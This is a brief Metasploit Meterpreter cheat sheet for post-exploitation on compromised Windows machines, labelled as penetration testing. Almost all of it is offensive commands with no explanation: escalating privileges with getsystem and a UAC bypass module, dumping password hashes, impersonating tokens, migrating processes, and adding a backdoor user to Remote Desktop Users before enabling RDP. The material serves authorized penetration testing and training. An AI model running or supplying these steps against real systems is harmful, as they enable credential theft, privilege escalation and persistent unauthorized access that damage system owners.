Auto Run Scripts

AutoRun Script on Metasploit Framework * Penetration Testing

PrivEsc:

getsystem

getuid

#If the above doesn't work, check if UAC is enabled and try the bypassuac module

#Bypass UAC
> background
> use exploit/windows/local/bypassuac

#Dump hashes
run post/windows/gather/hashdump

#Migrate
run post/windows/manage/migrate

#List running processes
ps

#download file
download

#upload file
upload

Enum:

sysinfo

run winenum

run post/windows/gather/win_privs

Incognito

use incognitor

list_tokens -u

impersonate_token <token>

RDP:

# Jump into the shell
net user guest_1 guestpwd /add
net localgroup "Remote Desktop Users" guest_1 /add
run getgui -e # Open RDP GUI